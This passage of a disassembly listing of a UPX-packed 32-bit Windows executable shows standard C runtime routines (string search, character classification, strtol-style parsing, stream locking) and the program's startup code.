lea eax, [ebp+var_20]
push eax
call sub_41ED2E
add esp, 10h
leave
retn
sub_41A3A5 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_41A3F0
loc_41A3E0: ; CODE XREF: sub_41A3F0+1F�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_41A3F0
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41A3F0 proc near ; CODE XREF: sub_40A7C0+18E�p
; sub_412CA0+132�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 0041A3E0 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_41A3F6: ; CODE XREF: sub_4199F0+74�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_41A41D
loc_41A408: ; CODE XREF: sub_41A3F0+2B�j
mov cl, [edx]
add edx, 1
cmp cl, bl
jz short loc_41A3E0
test cl, cl
jz short loc_41A466
test edx, 3
jnz short loc_41A408
loc_41A41D: ; CODE XREF: sub_41A3F0+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_41A428: ; CODE XREF: sub_41A3F0+63�j
; sub_41A3F0+72�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_41A46A
and eax, 81010100h
jz short loc_41A428
and eax, 1010100h
jnz short loc_41A464
and esi, 80000000h
jnz short loc_41A428
loc_41A464: ; CODE XREF: sub_41A3F0+6A�j
; sub_41A3F0+83�j ...
pop esi
pop edi
loc_41A466: ; CODE XREF: sub_41A3F0+23�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41A46A: ; CODE XREF: sub_41A3F0+5C�j
mov eax, [edx-4]
cmp al, bl
jz short loc_41A4A7
test al, al
jz short loc_41A464
cmp ah, bl
jz short loc_41A4A0
test ah, ah
jz short loc_41A464
shr eax, 10h
cmp al, bl
jz short loc_41A499
test al, al
jz short loc_41A464
cmp ah, bl
jz short loc_41A492
test ah, ah
jz short loc_41A464
jmp short loc_41A428
; ---------------------------------------------------------------------------
loc_41A492: ; CODE XREF: sub_41A3F0+9A�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41A499: ; CODE XREF: sub_41A3F0+92�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41A4A0: ; CODE XREF: sub_41A3F0+87�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_41A4A7: ; CODE XREF: sub_41A3F0+7F�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_41A3F0 endp
; =============== S U B R O U T I N E =======================================
sub_41A4AE proc near ; CODE XREF: start-6571A�p start-656F4�p ...
arg_0 = dword ptr 4
cmp dword_44BEB8, 1
jnz short loc_41A4BC
call sub_41FCB2
loc_41A4BC: ; CODE XREF: sub_41A4AE+7�j
push [esp+arg_0]
call sub_41FB3B
push 0FFh
call off_42A2D0
pop ecx
pop ecx
retn
sub_41A4AE endp
; =============== S U B R O U T I N E =======================================
sub_41A4D3 proc near ; CODE XREF: start-65744�p start-65733�p
arg_0 = dword ptr 4
cmp dword_44BEB8, 1
jnz short loc_41A4E1
call sub_41FCB2
loc_41A4E1: ; CODE XREF: sub_41A4D3+7�j
push [esp+arg_0]
call sub_41FB3B
push 0FFh
call sub_41E9D9
pop ecx
pop ecx
retn
sub_41A4D3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR start
loc_41A4F7: ; CODE XREF: start+241�j
push 60h
push offset stru_424FE0
call __SEH_prolog
mov edi, 94h
mov eax, edi
call sub_4192D0
mov [ebp-18h], esp
mov esi, esp
mov [esi], edi
push esi
call dword_424108 ; GetVersionExA
mov ecx, [esi+10h]
mov dword_44C048, ecx
mov eax, [esi+4]
mov dword_44C054, eax
mov edx, [esi+8]
mov dword_44C058, edx
mov esi, [esi+0Ch]
and esi, 7FFFh
mov dword_44C04C, esi
cmp ecx, 2
jz short loc_41A557
or esi, 8000h
mov dword_44C04C, esi
loc_41A557: ; CODE XREF: start-657C7�j
shl eax, 8
add eax, edx
mov dword_44C050, eax
xor esi, esi
push esi
mov edi, dword_424130
call edi ; GetModuleHandleA
cmp word ptr [eax], 5A4Dh
jnz short loc_41A592
mov ecx, [eax+3Ch]
add ecx, eax
cmp dword ptr [ecx], 4550h
jnz short loc_41A592
movzx eax, word ptr [ecx+18h]
cmp eax, 10Bh
jz short loc_41A5AA
cmp eax, 20Bh
jz short loc_41A597
loc_41A592: ; CODE XREF: start-6579F�j start-65792�j ...
mov [ebp-1Ch], esi
jmp short loc_41A5BE
; ---------------------------------------------------------------------------
loc_41A597: ; CODE XREF: start-65780�j
cmp dword ptr [ecx+84h], 0Eh
jbe short loc_41A592
xor eax, eax
cmp [ecx+0F8h], esi
jmp short loc_41A5B8
; ---------------------------------------------------------------------------
loc_41A5AA: ; CODE XREF: start-65787�j
cmp dword ptr [ecx+74h], 0Eh
jbe short loc_41A592
xor eax, eax
cmp [ecx+0E8h], esi
loc_41A5B8: ; CODE XREF: start-65768�j
setnz al
mov [ebp-1Ch], eax
loc_41A5BE: ; CODE XREF: start-6577B�j
push 1
call sub_41D132
pop ecx
test eax, eax
jnz short loc_41A5D2
push 1Ch
call sub_41A4D3
pop ecx
loc_41A5D2: ; CODE XREF: start-65748�j
call sub_41B4E8
test eax, eax
jnz short loc_41A5E3
push 10h
call sub_41A4D3
pop ecx
loc_41A5E3: ; CODE XREF: start-65737�j
call sub_4204A1
mov [ebp-4], esi
call sub_4202A3
test eax, eax
jge short loc_41A5FC
push 1Bh
call sub_41A4AE
pop ecx
loc_41A5FC: ; CODE XREF: start-6571E�j
call dword_4241A8 ; GetCommandLineA
mov ds:dword_47D784, eax
call sub_420181
mov dword_44BEB0, eax
call sub_4200DF
test eax, eax
jge short loc_41A622
push 8
call sub_41A4AE
pop ecx
loc_41A622: ; CODE XREF: start-656F8�j
call sub_41FEAC
test eax, eax
jge short loc_41A633
push 9
call sub_41A4AE
pop ecx
loc_41A633: ; CODE XREF: start-656E7�j
push 1
call sub_41EA33
pop ecx
mov [ebp-28h], eax
cmp eax, esi
jz short loc_41A649
push eax
call sub_41A4AE
pop ecx
loc_41A649: ; CODE XREF: start-656D0�j
mov [ebp-44h], esi
lea eax, [ebp-70h]
push eax
call dword_4241A4 ; GetStartupInfoA
call sub_41FE4F
mov [ebp-20h], eax
test byte ptr [ebp-44h], 1
jz short loc_41A66A
movzx eax, word ptr [ebp-40h]
jmp short loc_41A66D
; ---------------------------------------------------------------------------
loc_41A66A: ; CODE XREF: start-656AE�j
push 0Ah
pop eax
loc_41A66D: ; CODE XREF: start-656A8�j
push eax
push dword ptr [ebp-20h]
push esi
push esi
call edi ; GetModuleHandleA
push eax
call sub_40CCF0
mov edi, eax
mov [ebp-2Ch], edi
cmp [ebp-1Ch], esi
jnz short loc_41A68B
push edi
call sub_41EB60
loc_41A68B: ; CODE XREF: start-6568D�j
call sub_41EB82
jmp short loc_41A6BD
; END OF FUNCTION CHUNK FOR start
; =============== S U B R O U T I N E =======================================
sub_41A692 proc near ; DATA XREF: UPX0:stru_424FE0�o
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-24h], ecx
push eax
push ecx
call sub_41FCEB
pop ecx
pop ecx
retn
sub_41A692 endp
; ---------------------------------------------------------------------------
loc_41A6A6: ; DATA XREF: UPX0:stru_424FE0�o
mov esp, [ebp-18h]
mov edi, [ebp-24h]
cmp dword ptr [ebp-1Ch], 0
jnz short loc_41A6B8
push edi
call sub_41EB71
loc_41A6B8: ; CODE XREF: UPX0:0041A6B0�j
call sub_41EB91
; START OF FUNCTION CHUNK FOR start
loc_41A6BD: ; CODE XREF: start-65680�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, edi
lea esp, [ebp-7Ch]
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR start
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A6D0 proc near ; CODE XREF: sub_412CA0+DF�p
; sub_412CA0+1BA�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
add ecx, 1
neg ecx
sub edi, 1
mov al, [ebp+arg_4]
std
repne scasb
add edi, 1
cmp [edi], al
jz short loc_41A6F7
xor eax, eax
jmp short loc_41A6F9
; ---------------------------------------------------------------------------
loc_41A6F7: ; CODE XREF: sub_41A6D0+21�j
mov eax, edi
loc_41A6F9: ; CODE XREF: sub_41A6D0+25�j
cld
pop edi
leave
retn
sub_41A6D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A6FD proc near ; CODE XREF: sub_41A7C6+1A�p
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_0]
cmp dword ptr [esi+14h], 0
jz loc_41A7B3
cmp dword ptr [esi+24h], 0
jz short loc_41A722
cmp ebx, 7Fh
jbe loc_41A7B3
loc_41A722: ; CODE XREF: sub_41A6FD+1A�j
cmp ebx, 100h
jnb short loc_41A74C
cmp dword ptr [esi+28h], 1
jle short loc_41A73E
push 2
push ebx
push esi
call sub_41CEE8
add esp, 0Ch
jmp short loc_41A748
; ---------------------------------------------------------------------------
loc_41A73E: ; CODE XREF: sub_41A6FD+31�j
mov eax, [esi+48h]
movzx eax, byte ptr [eax+ebx*2]
and eax, 2
loc_41A748: ; CODE XREF: sub_41A6FD+3F�j
test eax, eax
jz short loc_41A7C0
loc_41A74C: ; CODE XREF: sub_41A6FD+2B�j
mov edx, [esi+48h]
mov eax, ebx
sar eax, 8
movzx ecx, al
test byte ptr [edx+ecx*2+1], 80h
jz short loc_41A76D
push 2
mov byte ptr [ebp+arg_0], al
mov byte ptr [ebp+arg_0+1], bl
mov byte ptr [ebp+arg_0+2], 0
pop eax
jmp short loc_41A777
; ---------------------------------------------------------------------------
loc_41A76D: ; CODE XREF: sub_41A6FD+5F�j
xor eax, eax
mov byte ptr [ebp+arg_0], bl
mov byte ptr [ebp+arg_0+1], 0
inc eax
loc_41A777: ; CODE XREF: sub_41A6FD+6E�j
push 1
push dword ptr [esi+4]
lea ecx, [ebp+var_4]
push 3
push ecx
push eax
lea eax, [ebp+arg_0]
push eax
push 200h
push dword ptr [esi+14h]
call sub_41C18B
add esp, 20h
test eax, eax
jz short loc_41A7C0
cmp eax, 1
jnz short loc_41A7A6
movzx eax, [ebp+var_4]
jmp short loc_41A7C2
; ---------------------------------------------------------------------------
loc_41A7A6: ; CODE XREF: sub_41A6FD+A1�j
movzx ecx, [ebp+var_3]
xor eax, eax
mov ah, [ebp+var_4]
or eax, ecx
jmp short loc_41A7C2
; ---------------------------------------------------------------------------
loc_41A7B3: ; CODE XREF: sub_41A6FD+10�j
; sub_41A6FD+1F�j
cmp ebx, 61h
jl short loc_41A7C0
cmp ebx, 7Ah
lea eax, [ebx-20h]
jle short loc_41A7C2
loc_41A7C0: ; CODE XREF: sub_41A6FD+4D�j
; sub_41A6FD+9C�j ...
mov eax, ebx
loc_41A7C2: ; CODE XREF: sub_41A6FD+A7�j
; sub_41A6FD+B4�j ...
pop esi
pop ebx
leave
retn
sub_41A6FD endp
; =============== S U B R O U T I N E =======================================
sub_41A7C6 proc near ; CODE XREF: sub_4139F0+28�p
arg_0 = dword ptr 4
call sub_41B330
mov eax, [eax+64h]
cmp eax, off_42A5CC
jz short loc_41A7DB
call sub_41B2CF
loc_41A7DB: ; CODE XREF: sub_41A7C6+E�j
push [esp+arg_0]
push eax
call sub_41A6FD
pop ecx
pop ecx
retn
sub_41A7C6 endp
; =============== S U B R O U T I N E =======================================
sub_41A7E8 proc near ; CODE XREF: sub_415CA0+14�p
; sub_41ED2E+111�p ...
arg_0 = dword ptr 4
call sub_41B330
mov eax, [eax+64h]
cmp eax, off_42A5CC
jz short loc_41A7FD
call sub_41B2CF
loc_41A7FD: ; CODE XREF: sub_41A7E8+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41A813
push 4
push [esp+4+arg_0]
push eax
call sub_41CEE8
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41A813: ; CODE XREF: sub_41A7E8+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 4
retn
sub_41A7E8 endp
; =============== S U B R O U T I N E =======================================
sub_41A822 proc near ; CODE XREF: sub_41ED2E+A5D�p
; sub_41ED2E+B8A�p
arg_0 = dword ptr 4
call sub_41B330
mov eax, [eax+64h]
cmp eax, off_42A5CC
jz short loc_41A837
call sub_41B2CF
loc_41A837: ; CODE XREF: sub_41A822+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41A850
push 80h
push [esp+4+arg_0]
push eax
call sub_41CEE8
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41A850: ; CODE XREF: sub_41A822+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 80h
retn
sub_41A822 endp
; =============== S U B R O U T I N E =======================================
sub_41A861 proc near ; CODE XREF: sub_41ED2E+54�p
; sub_41ED2E+75�p ...
arg_0 = dword ptr 4
call sub_41B330
mov eax, [eax+64h]
cmp eax, off_42A5CC
jz short loc_41A876
call sub_41B2CF
loc_41A876: ; CODE XREF: sub_41A861+E�j
cmp dword ptr [eax+28h], 1
jle short loc_41A88C
push 8
push [esp+4+arg_0]
push eax
call sub_41CEE8
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_41A88C: ; CODE XREF: sub_41A861+19�j
mov eax, [eax+48h]
mov ecx, [esp+arg_0]
movzx eax, byte ptr [eax+ecx*2]
and eax, 8
retn
sub_41A861 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A89B proc near ; CODE XREF: sub_41AA5A+E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
call sub_41B330
mov esi, [eax+64h]
cmp esi, off_42A5CC
jz short loc_41A8B9
call sub_41B2CF
mov esi, eax
loc_41A8B9: ; CODE XREF: sub_41A89B+15�j
mov ecx, [ebp+arg_0]
and [ebp+var_4], 0
mov bl, [ecx]
lea edi, [ecx+1]
loc_41A8C5: ; CODE XREF: sub_41A89B+55�j
cmp dword ptr [esi+28h], 1
movzx eax, bl
jle short loc_41A8DF
push 8
push eax
push esi
call sub_41CEE8
mov ecx, [ebp+arg_0]
add esp, 0Ch
jmp short loc_41A8E9
; ---------------------------------------------------------------------------
loc_41A8DF: ; CODE XREF: sub_41A89B+31�j
mov edx, [esi+48h]
movzx eax, byte ptr [edx+eax*2]
and eax, 8
loc_41A8E9: ; CODE XREF: sub_41A89B+42�j
test eax, eax
jz short loc_41A8F2
mov bl, [edi]
inc edi
jmp short loc_41A8C5
; ---------------------------------------------------------------------------
loc_41A8F2: ; CODE XREF: sub_41A89B+50�j
cmp bl, 2Dh
jnz short loc_41A8FD
or [ebp+arg_C], 2
jmp short loc_41A902
; ---------------------------------------------------------------------------
loc_41A8FD: ; CODE XREF: sub_41A89B+5A�j
cmp bl, 2Bh
jnz short loc_41A905
loc_41A902: ; CODE XREF: sub_41A89B+60�j
mov bl, [edi]
inc edi
loc_41A905: ; CODE XREF: sub_41A89B+65�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_41AA4A
cmp eax, 1
jz loc_41AA4A
cmp eax, 24h
jg loc_41AA4A
test eax, eax
push 10h
pop ecx
jnz short loc_41A94D
cmp bl, 30h
jz short loc_41A937
mov [ebp+arg_8], 0Ah
jmp short loc_41A965
; ---------------------------------------------------------------------------
loc_41A937: ; CODE XREF: sub_41A89B+91�j
mov al, [edi]
cmp al, 78h
jz short loc_41A94A
cmp al, 58h
jz short loc_41A94A
mov [ebp+arg_8], 8
jmp short loc_41A965
; ---------------------------------------------------------------------------
loc_41A94A: ; CODE XREF: sub_41A89B+A0�j
; sub_41A89B+A4�j
mov [ebp+arg_8], ecx
loc_41A94D: ; CODE XREF: sub_41A89B+8C�j
cmp [ebp+arg_8], ecx
jnz short loc_41A965
cmp bl, 30h
jnz short loc_41A965
mov al, [edi]
cmp al, 78h
jz short loc_41A961
cmp al, 58h
jnz short loc_41A965
loc_41A961: ; CODE XREF: sub_41A89B+C0�j
inc edi
mov bl, [edi]
inc edi
loc_41A965: ; CODE XREF: sub_41A89B+9A�j
; sub_41A89B+AD�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
loc_41A96D: ; CODE XREF: sub_41A89B+134�j
mov esi, off_42AB04
movzx ecx, bl
mov cx, [esi+ecx*2]
test cl, 4
jz short loc_41A987
movsx ecx, bl
sub ecx, 30h
jmp short loc_41A9A6
; ---------------------------------------------------------------------------
loc_41A987: ; CODE XREF: sub_41A89B+E2�j
test cx, 103h
jz short loc_41A9D1
cmp bl, 61h
jl short loc_41A9A0
cmp bl, 7Ah
jg short loc_41A9A0
movsx ecx, bl
sub ecx, 20h
jmp short loc_41A9A3
; ---------------------------------------------------------------------------
loc_41A9A0: ; CODE XREF: sub_41A89B+F6�j
; sub_41A89B+FB�j
movsx ecx, bl
loc_41A9A3: ; CODE XREF: sub_41A89B+103�j
add ecx, 0FFFFFFC9h
loc_41A9A6: ; CODE XREF: sub_41A89B+EA�j
cmp ecx, [ebp+arg_8]
jnb short loc_41A9D1
or [ebp+arg_C], 8
cmp [ebp+var_4], eax
jb short loc_41A9C0
jnz short loc_41A9BA
cmp ecx, edx
jbe short loc_41A9C0
loc_41A9BA: ; CODE XREF: sub_41A89B+119�j
or [ebp+arg_C], 4
jmp short loc_41A9CC
; ---------------------------------------------------------------------------
loc_41A9C0: ; CODE XREF: sub_41A89B+117�j
; sub_41A89B+11D�j
mov esi, [ebp+var_4]
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_4], esi
loc_41A9CC: ; CODE XREF: sub_41A89B+123�j
mov bl, [edi]
inc edi
jmp short loc_41A96D
; ---------------------------------------------------------------------------
loc_41A9D1: ; CODE XREF: sub_41A89B+F1�j
; sub_41A89B+10E�j
mov eax, [ebp+arg_C]
dec edi
test al, 8
jnz short loc_41A9E8
cmp [ebp+arg_4], 0
jz short loc_41A9E2
mov edi, [ebp+arg_0]
loc_41A9E2: ; CODE XREF: sub_41A89B+142�j
and [ebp+var_4], 0
jmp short loc_41AA33
; ---------------------------------------------------------------------------
loc_41A9E8: ; CODE XREF: sub_41A89B+13C�j
test al, 4
mov esi, 7FFFFFFFh
jnz short loc_41AA0C
test al, 1
jnz short loc_41AA33
and eax, 2
jz short loc_41AA03
cmp [ebp+var_4], 80000000h
ja short loc_41AA0C
loc_41AA03: ; CODE XREF: sub_41A89B+15D�j
test eax, eax
jnz short loc_41AA33
cmp [ebp+var_4], esi
jbe short loc_41AA33
loc_41AA0C: ; CODE XREF: sub_41A89B+154�j
; sub_41A89B+166�j
call sub_41E685
test byte ptr [ebp+arg_C], 1
mov dword ptr [eax], 22h
jz short loc_41AA23
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_41AA33
; ---------------------------------------------------------------------------
loc_41AA23: ; CODE XREF: sub_41A89B+180�j
mov al, byte ptr [ebp+arg_C]
and al, 2
neg al
sbb eax, eax
neg eax
add eax, esi
mov [ebp+var_4], eax
loc_41AA33: ; CODE XREF: sub_41A89B+14B�j
; sub_41A89B+158�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_41AA3C
mov [eax], edi
loc_41AA3C: ; CODE XREF: sub_41A89B+19D�j
test byte ptr [ebp+arg_C], 2
jz short loc_41AA45
neg [ebp+var_4]
loc_41AA45: ; CODE XREF: sub_41A89B+1A5�j
mov eax, [ebp+var_4]
jmp short loc_41AA55
; ---------------------------------------------------------------------------
loc_41AA4A: ; CODE XREF: sub_41A89B+6F�j
; sub_41A89B+78�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_41AA53
mov [eax], ecx
loc_41AA53: ; CODE XREF: sub_41A89B+1B4�j
xor eax, eax
loc_41AA55: ; CODE XREF: sub_41A89B+1AD�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A89B endp
; =============== S U B R O U T I N E =======================================
sub_41AA5A proc near ; CODE XREF: sub_415CE0+55�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41A89B
add esp, 10h
retn
sub_41AA5A endp
; =============== S U B R O U T I N E =======================================
sub_41AA71 proc near ; DATA XREF: UPX0:00428038�o
mov eax, ds:dword_47D780
test eax, eax
push esi
push 14h
pop esi
jnz short loc_41AA85
mov eax, 200h
jmp short loc_41AA8B
; ---------------------------------------------------------------------------
loc_41AA85: ; CODE XREF: sub_41AA71+B�j
cmp eax, esi
jge short loc_41AA90
mov eax, esi
loc_41AA8B: ; CODE XREF: sub_41AA71+12�j
mov ds:dword_47D780, eax
loc_41AA90: ; CODE XREF: sub_41AA71+16�j
push 4
push eax
call sub_420529
test eax, eax
pop ecx
pop ecx
mov ds:dword_47C778, eax
jnz short loc_41AAC1
push 4
push esi
mov ds:dword_47D780, esi
call sub_420529
test eax, eax
pop ecx
pop ecx
mov ds:dword_47C778, eax
jnz short loc_41AAC1
push 1Ah
pop eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41AAC1: ; CODE XREF: sub_41AA71+30�j
; sub_41AA71+49�j
xor edx, edx
mov ecx, offset off_42A2E0
jmp short loc_41AACF
; ---------------------------------------------------------------------------
loc_41AACA: ; CODE XREF: sub_41AA71+6D�j
mov eax, ds:dword_47C778
loc_41AACF: ; CODE XREF: sub_41AA71+57�j
mov [edx+eax], ecx
add ecx, 20h
add edx, 4
cmp ecx, offset dword_42A560
jl short loc_41AACA
xor ecx, ecx
mov edx, offset dword_42A2F0
loc_41AAE7: ; CODE XREF: sub_41AA71+A3�j
mov esi, ecx
mov eax, ecx
and eax, 1Fh
sar esi, 5
mov esi, ds:dword_47C640[esi*4]
lea eax, [eax+eax*8]
mov eax, [esi+eax*4]
cmp eax, 0FFFFFFFFh
jz short loc_41AB07
test eax, eax
jnz short loc_41AB0A
loc_41AB07: ; CODE XREF: sub_41AA71+90�j
or dword ptr [edx], 0FFFFFFFFh
loc_41AB0A: ; CODE XREF: sub_41AA71+94�j
add edx, 20h
inc ecx
cmp edx, offset dword_42A350
jl short loc_41AAE7
xor eax, eax
pop esi
retn
sub_41AA71 endp
; =============== S U B R O U T I N E =======================================
sub_41AB1A proc near ; DATA XREF: UPX0:0042804C�o
; FUNCTION CHUNK AT 004205E4 SIZE 00000092 BYTES
call sub_41DF4F
cmp byte_44C080, 0
jz short locret_41AB2D
jmp loc_4205E4
; ---------------------------------------------------------------------------
locret_41AB2D: ; CODE XREF: sub_41AB1A+C�j
retn
sub_41AB1A endp
; =============== S U B R O U T I N E =======================================
sub_41AB2E proc near ; CODE XREF: sub_419E9A+27�p
; sub_419FF2+F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_42A2E0
cmp eax, ecx
jb short loc_41AB52
cmp eax, offset dword_42A540
ja short loc_41AB52
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_41D0E7
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41AB52: ; CODE XREF: sub_41AB2E+B�j
; sub_41AB2E+12�j
add eax, 20h
push eax
call dword_4241AC ; RtlEnterCriticalSection
retn
sub_41AB2E endp
; =============== S U B R O U T I N E =======================================
sub_41AB5D proc near ; CODE XREF: sub_41DE7A+44�p
; sub_41E70A+66�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_41AB71
add eax, 10h
push eax
call sub_41D0E7
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41AB71: ; CODE XREF: sub_41AB5D+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call dword_4241AC ; RtlEnterCriticalSection
retn
sub_41AB5D endp
; =============== S U B R O U T I N E =======================================
sub_41AB80 proc near ; CODE XREF: sub_419EE3+1�p
; sub_41A034+3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, offset off_42A2E0
cmp eax, ecx
jb short loc_41ABA4
cmp eax, offset dword_42A540
ja short loc_41ABA4
sub eax, ecx
sar eax, 5
add eax, 10h
push eax
call sub_41D032
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41ABA4: ; CODE XREF: sub_41AB80+B�j
; sub_41AB80+12�j
add eax, 20h
push eax
call dword_4241B0 ; RtlLeaveCriticalSection
retn
sub_41AB80 endp
; =============== S U B R O U T I N E =======================================
sub_41ABAF proc near ; CODE XREF: sub_41DF1A+9�p
; sub_41E70A+7D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp eax, 14h
jge short loc_41ABC3
add eax, 10h
push eax
call sub_41D032
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41ABC3: ; CODE XREF: sub_41ABAF+7�j
mov eax, [esp+arg_4]
add eax, 20h
push eax
call dword_4241B0 ; RtlLeaveCriticalSection
retn
sub_41ABAF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ABD2 proc near ; CODE XREF: sub_417710+E8�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 0Ch
push offset stru_424FF0
call __SEH_prolog
mov esi, [ebp+arg_4]
push esi
call sub_41AB2E
pop ecx
and [ebp+ms_exc.disabled], 0
dec dword ptr [esi+4]
js short loc_41ABFF
mov ecx, [esi]
mov al, byte ptr [ebp+arg_0]
mov [ecx], al
movzx eax, al
inc dword ptr [esi]
jmp short loc_41AC0A
; ---------------------------------------------------------------------------
loc_41ABFF: ; CODE XREF: sub_41ABD2+1D�j
push esi
push [ebp+arg_0]
call sub_41C547
pop ecx
pop ecx
loc_41AC0A: ; CODE XREF: sub_41ABD2+2B�j
mov [ebp+var_1C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41AC22
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_41ABD2 endp
; =============== S U B R O U T I N E =======================================
sub_41AC1F proc near ; DATA XREF: UPX0:stru_424FF0�o
mov esi, [ebp+0Ch]
sub_41AC1F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41AC22 proc near ; CODE XREF: sub_41ABD2+3F�p
push esi
call sub_41AB80
pop ecx
retn
sub_41AC22 endp
; =============== S U B R O U T I N E =======================================
sub_41AC2A proc near ; DATA XREF: UPX0:00424EF8�o
mov eax, dword_44BEC0
test eax, eax
jz short loc_41AC35
call eax
loc_41AC35: ; CODE XREF: sub_41AC2A+7�j
push 19h
call sub_41A4AE
pop ecx
retn
sub_41AC2A endp
; =============== S U B R O U T I N E =======================================
sub_41AC3E proc near ; CODE XREF: sub_4191C1+8�p
; sub_419D9F+1F�p ...
arg_0 = dword ptr 4
mov eax, dword_44BEC4
test eax, eax
jz short loc_41AC56
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_41AC56
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41AC56: ; CODE XREF: sub_41AC3E+7�j
; sub_41AC3E+12�j
xor eax, eax
retn
sub_41AC3E endp
; =============== S U B R O U T I N E =======================================
sub_41AC59 proc near ; CODE XREF: sub_419224+2C�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
mov dword ptr [esi], offset off_425000
push dword ptr [edi]
call sub_41FAB0
inc eax
push eax
call sub_419DCB
test eax, eax
pop ecx
pop ecx
mov [esi+4], eax
jz short loc_41AC88
push dword ptr [edi]
push eax
call sub_41BFB0
pop ecx
pop ecx
loc_41AC88: ; CODE XREF: sub_41AC59+23�j
pop edi
mov dword ptr [esi+8], 1
mov eax, esi
pop esi
retn 4
sub_41AC59 endp
; =============== S U B R O U T I N E =======================================
sub_41AC96 proc near ; CODE XREF: UPX0:00419213�p
; sub_419224+4A�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push edi
mov edi, [esp+8+arg_0]
mov dword ptr [esi], offset off_425000
mov eax, [edi+8]
test eax, eax
mov [esi+8], eax
jz short loc_41ACD3
push dword ptr [edi+4]
call sub_41FAB0
inc eax
push eax
call sub_419DCB
test eax, eax
pop ecx
pop ecx
mov [esi+4], eax
jz short loc_41ACD9
push dword ptr [edi+4]
push eax
call sub_41BFB0
pop ecx
pop ecx
jmp short loc_41ACD9
; ---------------------------------------------------------------------------
loc_41ACD3: ; CODE XREF: sub_41AC96+16�j
mov eax, [edi+4]
mov [esi+4], eax
loc_41ACD9: ; CODE XREF: sub_41AC96+2E�j
; sub_41AC96+3B�j
pop edi
mov eax, esi
pop esi
retn 4
sub_41AC96 endp
